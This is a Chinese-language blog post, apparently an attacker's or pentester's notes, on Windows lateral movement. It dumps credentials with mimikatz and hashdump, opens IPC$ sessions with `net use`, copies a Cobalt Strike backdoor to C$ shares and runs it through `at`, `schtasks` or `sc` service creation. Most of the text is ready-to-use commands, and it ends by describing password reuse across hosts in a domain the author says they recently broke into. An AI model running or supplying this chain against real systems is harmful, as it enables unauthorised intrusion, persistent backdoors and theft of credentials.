IPC命令&計划任務上線

前言

 

很久一段時間沒有用cs滲透了，有些命令比較生疏，在虛擬機里面搭建環境復習下ipc命令

 

IPC$(Internet Process Connection) 是為了讓進程之間通信的一種“管道”，通過提供用戶名密碼建立了一條安全的、加密的、用於數據交換的通道。當然，還是在同一個時間，還是同樣的兩個IP，他們之間只能建立一個IPC$連接，腳踏多條船無論什么時候都是不可取的。通過這個連接，可以實現在被連接的目標機器上搞文件上傳、下載、命令執行......

 

關於IPC$+計划任務的橫向，我們的目的非常明確，思路非常美好：

 

（1）首先建立向目標主機的IPC$連接

（2）其次把命令執行的腳本傳到目標主機

（3）再次創建計划任務在目標機器上執行命令腳本

（4）最后過河拆橋刪除IPC$連接

 

當然想要用IPC$來橫向是有條件的：

 

（1）目標機器沒有禁用IPC$連接，沒有什么防火防盜攔截IPC$，139 445 端口也開了（能走445走445，不能則走139）

（2）目標機器小管理員開了IPC$默認共享服務（邏輯盤、系統目錄；都不開我訪問個啥？）

（3）獲取了目標機器的小管理員的管理員權限的賬號密碼（最好是域管理員賬號密碼），明文的

（4）目標系統能支持IPC$，且和攻擊機能彼此互通（廢話）

 

關於一些ipc$報錯：

 

　　錯誤號 5，拒絕訪問（很可能你使用的用戶不是管理員權限的，先提升權限）

　　錯誤號 51，Windows 無法找到網絡路徑（網絡有問題）

　　錯誤號 53，找不到網絡路徑（ip 地址錯誤；目標未開機；目標 lanmanserver 服務未啟動；目標有防火牆（端口過濾））

　　錯誤號 67，找不到網絡名（你的 lanmanworkstation 服務未啟動；目標刪除了 ipc$；）

　　錯誤號 1219，提供的憑據與已存在的憑據集沖突（你已經和對方建立了一個ipc$，請刪除后再連）

　　錯誤號 1326，未知的用戶名或錯誤密碼

　　錯誤號 1385，登錄失敗：未授予用戶在此計算機上的請求登錄類型

　　錯誤號 1792，試圖登錄，但是網絡登錄服務沒有啟動（目標NetLogon服務未啟動[連接域控會出現此情況]）

　　錯誤號 2242，此用戶的密碼已經過期（目標有帳號策略，強制定期要求更改密碼）

 

　　建立連接后，可以把生成的木馬從攻擊機上傳、粘貼到目標機器上

　　

　　本地命令可以copy，用CS beacon的可以upload，總之把自己寫的或者是工具生成的木馬搞到目標機器上

 

　　接下來創建windows計划任務，自動執行木馬反彈連接到攻擊機器

 

　　值得注意的是，如何自動執行木馬，在windows中常用的就是計划任務at和schtasks

 

ipc命令

 

先hashdump logonpasswords 抓一波密碼

 

 

可以看到hashdump抓到的是md5，mimikatz抓到的是明文密碼

 

 

net use \\ip “密碼” /user:”登陸賬戶”  建立IPC$連接

 

 

net use  查看網絡連接

 

 

 

net use z:  \\ip\c$ "密碼" /user:"Administrator"  把目標C盤映射到本地z盤

 

 

在我的電腦目錄如下

 

 

net use \\ip\ipc$ 刪除ipc連接

 

 

net use z: /del 刪除共享映射

 

 

at計划任務上線

 

at計划任務只用於2003及以下的系統，之后都用schtasks計划上線，我這里試了我的一台xp虛擬機和一台2003服務器，都是報錯384，沒有辦法只有寫下命令

 

 

net use \\ip\IPC$     "密碼"     /user:"用戶名"   

copy  door.exe   \\ip\c$     復制后門程序到 C 盤根目錄　

net time    \\ip    查看遠程主機的當前系統時間

at \\ip  11:11 door.exe  定時在遠程主機執行后門程序，要大於當前的遠程主機時間 ，不然就是在第二天的這個時間執行

at \\ip   查看遠程主機當前的計划任務ID

 

這里更新一下

 

后來我在百度查了一下資料后發現，因為2003及xp都用的是SMB1協議，因為安全性的原因，win10是不自帶這個協議的，win10用的是SMB2協議，但是還是保留了可以安裝SMB1協議

 

安裝路徑為：控制面板 - 卸載程序 - 啟動火關閉windows功能，找到SMB1協議，勾上安裝后重啟后即可執行ipc$命令

 

命令執行的話列在前面了，而且跟schtasks大同小異，就不繼續貼圖了

 

 

 

 

 

 

 

schtasks計划上線

 

建立ipc連接

 

 

復制cs生成的木馬winsql.exe到c盤根目錄

 

copy winsql.exe \\192.168.10.3\c$\win.exe

 

 

查看虛擬機里面的c盤下，發現win.exe已經在目錄下了 

 

 

查看時間

 

net time \\192.168.10.3

 

 

 

創建計划任務cs

 

schtasks /create /TN cs /TR C:\win.exe /SC once /ST 19:35

 

 

查看名為cs的計划任務

 

schtasks /query /TN cs

 

 

計划任務靜默上線，任務管理器里面能夠看見

 

 

回到cs發現已經已經上線

 

 

刪除計划任務

 

schtasks /delete /tn "cs"

 

 

除了IPC$配合windows計划任務之外，還可以嘗試配合windows系統命令（sc）

和上文一樣的道理，需要先建立IPC$連接，再把腳本傳到目標機器中，區別在於還可以創建一個服務，服務用於運行木馬

　　例子：

　　sc \\<IP> create <servicename>binpath=”<path>”

　　sc \\192.168.200.10 create hacker binpath=”c:\shell.exe”   #創建服務

　　sc \\192.168.200.10 start hacker      #啟動hacker服務

　　sc \\192.168.200.10 delete hacker  #刪除hacker服務

 

 

 

這里補充說明下如何批量使用ipc：

 

 

我們知道一個域內這么多台主機，如果域管一台一台的配置將會耗費大量時間，那么有些比較懶的域管可能會用批量設置域內機器的方法去設置密碼，那么我們抓到我們進入內網這台主機的hash（明文），用ipc指令去一台一台的撞庫即可

 

 

這是前兩天進的一個域，c段主機很多，只撞了幾台，有兩台跟我進內網的這台主機密碼相同